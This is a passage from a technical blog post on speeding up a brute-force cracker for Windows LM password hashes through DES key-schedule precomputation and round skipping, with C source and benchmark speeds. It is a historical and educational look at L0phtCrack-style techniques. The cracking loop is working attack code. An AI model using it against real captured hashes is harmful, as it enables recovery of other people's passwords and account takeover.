        d[3] = _mm_or_si128(s[3], p[3]); \
        d[4] = _mm_or_si128(s[4], p[4]); \
        d[5] = _mm_or_si128(s[5], p[5]); \
        d[6] = _mm_or_si128(s[6], p[6]); \
        d[7] = _mm_or_si128(s[7], p[7]); \
    } \
}
#else
#define DES_SET_KEY(idx) { \
    uint64_t *p = (uint64_t*)&ks[idx]; \
    uint64_t *s = (uint64_t*)&ks_tbl[idx-1][c->pwd_idx[idx-1]]; \
    uint64_t *d = (uint64_t*)&ks[idx-1]; \
    \
    d[ 0]=s[ 0]; d[ 1]=s[ 1]; d[ 2]=s[ 2]; d[ 3]=s[ 3]; \
    d[ 4]=s[ 4]; d[ 5]=s[ 5]; d[ 6]=s[ 6]; d[ 7]=s[ 7]; \
    d[ 8]=s[ 8]; d[ 9]=s[ 9]; d[10]=s[10]; d[11]=s[11]; \
    d[12]=s[12]; d[13]=s[13]; d[14]=s[14]; d[15]=s[15]; \
    \
    if(idx < 7) { \
      d[ 0] |= p[ 0]; d[ 1] |= p[ 1]; \
      d[ 2] |= p[ 2]; d[ 3] |= p[ 3]; \
      d[ 4] |= p[ 4]; d[ 5] |= p[ 5]; \
      d[ 6] |= p[ 6]; d[ 7] |= p[ 7]; \
      d[ 8] |= p[ 8]; d[ 9] |= p[ 9]; \
      d[10] |= p[10]; d[11] |= p[11]; \
      d[12] |= p[12]; d[13] |= p[13]; \
      d[14] |= p[14]; d[15] |= p[15]; \
    } \
}
#endif

This really speeds up an attack, but we’re not entirely finished yet.

9. Initial and Final Permutation

So far, we’ve focused primarily on the key scheduling algorithm, but now let’s examine the encryption algorithm and try to reduce the amount of code required for this process.

Before encryption, the 64-bit plaintext is remapped using something known as Initial Permutation (IP). After 16 rounds of encryption have been applied, the inverse known as Final Permutation (FP) is applied. Believe it or not, both IP and FP were made part of the DES specification simply because of how expensive it was to build hardware back in the 1970s. The designers identified an issue with the wiring of hardware after the project was completed and had the choice between building a new hardware device or changing the specification.

It was simply cheaper to change the specification and it’s widely accepted this additional process does not affect security of the cipher in any way. It is akin to a modern block cipher such as NOEKEON or SM4 that converts the plaintext to big-endian on little-endian machines. As you can see from the code below, it requires a lot of operations. By removing the permutation for both the plaintext and ciphertext, there is a significant increase in the speed of recovery.

#define ROTATE(a,n)(((a)>>(n))+((a)<<(32-(n))))

#define PERM_OP(a,b,t,n,m) ((t)=((((a)>>(n))^(b))&(m)),\
        (b)^=(t),\
        (a)^=((t)<<(n)))

#define IP(l,r) \
        { \
        register uint32_t tt; \
        PERM_OP(r,l,tt, 4,0x0f0f0f0fL); \
        PERM_OP(l,r,tt,16,0x0000ffffL); \
        PERM_OP(r,l,tt, 2,0x33333333L); \
        PERM_OP(l,r,tt, 8,0x00ff00ffL); \
        PERM_OP(r,l,tt, 1,0x55555555L); \
        }
        
    // perform initial permutation on ciphertext/hash
    h[0] = c->hash.w[0];
    h[1] = c->hash.w[1];
    IP(h[0], h[1]);
    h[0] = ROTATE(h[0], 29) & 0xffffffffL;
    h[1] = ROTATE(h[1], 29) & 0xffffffffL;

The plaintext KGS!@#$% in its hexadecimal representation is 0x4B47532140232425. Once the initial permutation has been applied, we end up with 0xAA1907472400B807 that gets loaded into L and R before applying each round of encryption.

10. Skipping Rounds

We can safely skip the last round of encryption by first checking the result of L with half of the LM hash we are trying to crack. If they are equal, only then do we apply the last round and check R.

                  // permuted plaintext
                  r = 0x2400B807; l = 0xAA190747;

                  k = (uint32_t*)&ks[0];

                  // encrypt
                  DES_F(l, r,  0); DES_F(r, l,  2);
                  DES_F(l, r,  4); DES_F(r, l,  6);     
                  DES_F(l, r,  8); DES_F(r, l, 10);    
                  DES_F(l, r, 12); DES_F(r, l, 14);   
                  DES_F(l, r, 16); DES_F(r, l, 18);    
                  DES_F(l, r, 20); DES_F(r, l, 22);    
                  DES_F(l, r, 24); DES_F(r, l, 26);    
                  DES_F(l, r, 28);   

                  c->complete++;

                  // do we have one half of the LM hash?
                  if (h[0] == l) {
                    // apply the last round
                    DES_F(r, l, 30);
                    // do we have the full hash?
                    if (h[1] == r) {
                      // ok, we found the key
                      c->found = true;
                      return true;
                    }
                  }

11. Version 3

Note how the key schedule buffers are aligned by 32 bytes. This is to enable using AVX2.

static bool crack_lm3(void *param) {
    uint32_t         h[2], l, r, t, u, *k;
    DES_key_schedule ks_tbl[7][256] __attribute__ ((aligned(32)));
    DES_key_schedule ks[7]          __attribute__ ((aligned(32)));
    crack_opt_t      *c=(crack_opt_t*)param;
    
    // precompute key schedules for alphabet
    DES_init_keys2(c->alphabet, ks_tbl);
        
    // perform initial permutation on ciphertext/hash
    h[0] = c->hash.w[0];
    h[1] = c->hash.w[1];
    IP(h[0], h[1]);
    h[0] = ROTATE(h[0], 29) & 0xffffffffL;
    h[1] = ROTATE(h[1], 29) & 0xffffffffL;

    // set the initial key schedules based on pwd_idx
    for (int i=7; i>0; i--) {
      // if not set, skip it
      if (c->pwd_idx[i-1] == ~0UL) continue;
      // set key schedule for this index
      DES_SET_KEY(i);
    }

    goto compute_lm;

    do {
      DES_SET_KEY(7);
      do {
        DES_SET_KEY(6);
        do {
          DES_SET_KEY(5);
          do {
            DES_SET_KEY(4);
            do {
              DES_SET_KEY(3);
              do {
                DES_SET_KEY(2);
                do {
                  DES_SET_KEY(1);
compute_lm:
                  // permuted plaintext
                  r = 0x2400B807; l = 0xAA190747;

                  k = (uint32_t*)&ks[0];

                  // encrypt
                  DES_F(l, r,  0); DES_F(r, l,  2);
                  DES_F(l, r,  4); DES_F(r, l,  6);     
                  DES_F(l, r,  8); DES_F(r, l, 10);    
                  DES_F(l, r, 12); DES_F(r, l, 14);   
                  DES_F(l, r, 16); DES_F(r, l, 18);    
                  DES_F(l, r, 20); DES_F(r, l, 22);    
                  DES_F(l, r, 24); DES_F(r, l, 26);    
                  DES_F(l, r, 28);   

                  c->complete++;

                  // do we have one half of the LM hash?
                  if (h[0] == l) {
                    // apply the last round
                    DES_F(r, l, 30);
                    // do we have the full hash?
                    if (h[1] == r) {
                      // ok, we found the key
                      c->found = true;
                      return true;
                    }
                  }

                  if (--c->total_cbn == 0) return false;
                  if (c->stopped) return false;

                } while (++c->pwd_idx[0] < c->alpha_len);
                c->pwd_idx[0] = 0;
              } while (++c->pwd_idx[1] < c->alpha_len);
              c->pwd_idx[1] = 0;
            } while (++c->pwd_idx[2] < c->alpha_len);
            c->pwd_idx[2] = 0;
          } while (++c->pwd_idx[3] < c->alpha_len);
          c->pwd_idx[3] = 0;
        } while (++c->pwd_idx[4] < c->alpha_len);
        c->pwd_idx[4] = 0;
      } while (++c->pwd_idx[5] < c->alpha_len);
      c->pwd_idx[5] = 0;
    } while (++c->pwd_idx[6] < c->alpha_len);
    return false;
}

Now we’re talking! Over 3.5 million keys per second more than version 2.

12. Precomputing Key Schedules 2

Our final optimization in C is the precomputation of key schedules for all 2-byte passwords and storing them in memory. For the alphabet A-Z, this requires 86,528 bytes of RAM. 69 characters would require 609,408 bytes of RAM. For devices that perform better with large blocks of memory, one might consider precomputing key schedules for all 3-byte passwords depending on the circumstances. Worst case scenario for 3-byte passwords is around 42MB. I’ve not tried using this amount, but it might be worth researching.

    // create key schedules for every two character password
    for(i=0;i<c->alpha_len;i++) {
      memset(pwd, 0, sizeof(pwd));
      pwd[0] = c->alphabet[i];

      for(j=0;j<c->alpha_len;j++) {
        pwd[1] = c->alphabet[j];
        DES_str_to_key((char*)pwd, (uint8_t*)&key);
        DES_set_key(&key, p);
        p++;
      }
    }

The F round is also changed to factor in the 2-byte key schedules. k1 points to the key schedule for bytes 3-7 while k2 points to the key schedules for every 2-byte combination.

#define LOAD_DATA_tmp(a,b,c,d,e,f) LOAD_DATA(a,b,c,d,e,f,g)
#define LOAD_DATA(R,S,u,t,E0,E1,tmp) \
        u=R^(k1[S  ] | k2[S  ]); \
        t=R^(k1[S+1] | k2[S+1]);

#define DES_F(LL,R,S) {\
        LOAD_DATA_tmp(R,S,u,t,E0,E1); \
        t=ROTATE(t,4); \
        LL^=DES_sbox[0][(u>> 2L)&0x3f]^ \
            DES_sbox[2][(u>>10L)&0x3f]^ \
            DES_sbox[4][(u>>18L)&0x3f]^ \
            DES_sbox[6][(u>>26L)&0x3f]^ \
            DES_sbox[1][(t>> 2L)&0x3f]^ \
            DES_sbox[3][(t>>10L)&0x3f]^ \
            DES_sbox[5][(t>>18L)&0x3f]^ \
            DES_sbox[7][(t>>26L)&0x3f]; }

13. Version 4

cbn contains the length of the alphabet squared. For [A,Z], that’s 26^{2} or 676 combinations. By keeping the code inside the CPU cache longer, this helps improve performance.

    k1 = (uint32_t*)&ks1[2];
    k2 = (uint32_t*)&ks2[0];
    
    k2 += ((c->pwd_idx[0] * c->alpha_len) + c->pwd_idx[1]) * 32;
    cbn = c->alpha_len * c->alpha_len;
    
    goto compute_lm;

    do {
      DES_SET_KEY(7);
      do {
        DES_SET_KEY(6);
        do {
          DES_SET_KEY(5);
          do {
            DES_SET_KEY(4);
            do {
              DES_SET_KEY(3);
              k2 = (uint32_t*)&ks2[0];
compute_lm:
              for(i=0;i<cbn;i++) {
                // permuted plaintext
                r = 0x2400B807; l = 0xAA190747;

                // encrypt
                DES_F(l, r,  0); 
                DES_F(r, l,  2); DES_F(l, r,  4); 
                DES_F(r, l,  6); DES_F(l, r,  8); 
                DES_F(r, l, 10); DES_F(l, r, 12); 
                DES_F(r, l, 14); DES_F(l, r, 16); 
                DES_F(r, l, 18); DES_F(l, r, 20); 
                DES_F(r, l, 22); DES_F(l, r, 24); 
                DES_F(r, l, 26); DES_F(l, r, 28); 
                
                if (h[0] == l) {
                  DES_F(r, l, 30);
                  if (h[1] == r) {
                    // yay, we found it.
                    c->pwd_idx[0] = (i / c->alpha_len);
                    c->pwd_idx[1] = (i % c->alpha_len);
                    c->found = true;
                    return true;
                  }
                }
                k2+=32;
              }
              c->complete += cbn;
              c->total_cbn -= cbn;
              if ((int64_t)c->total_cbn<0) return false;
              if (c->stopped) return false;
                
            } while (++c->pwd_idx[2] < c->alpha_len);
            c->pwd_idx[2] = 0;
          } while (++c->pwd_idx[3] < c->alpha_len);
          c->pwd_idx[3] = 0;
        } while (++c->pwd_idx[4] < c->alpha_len);
        c->pwd_idx[4] = 0;
      } while (++c->pwd_idx[5] < c->alpha_len);
      c->pwd_idx[5] = 0;
    } while (++c->pwd_idx[6] < c->alpha_len);
    return false;

We see a modest increase in speed for a single thread, but this will make more of a difference in multithreaded mode. This time we have 8.64 million keys per second.

14. Results

Here are all four routines running one after the other using multiple threads.

We achieve a 300% speed increase, but that’s significantly less than the 450% gain advertised by L0phtCrack twenty years ago. The only explanation I can think of at this point is that optimizers for compilers 22 years ago were not as good as they are today. Well written assembler routines would increase the speed further, but not by that much IMHO. What I’ve shown here may not be exactly how the L0pht did it, but i’d say it’s probably close enough.

Source code

Posted in cryptography, passwords, programming, security, windows | Tagged , , , , | 1 Comment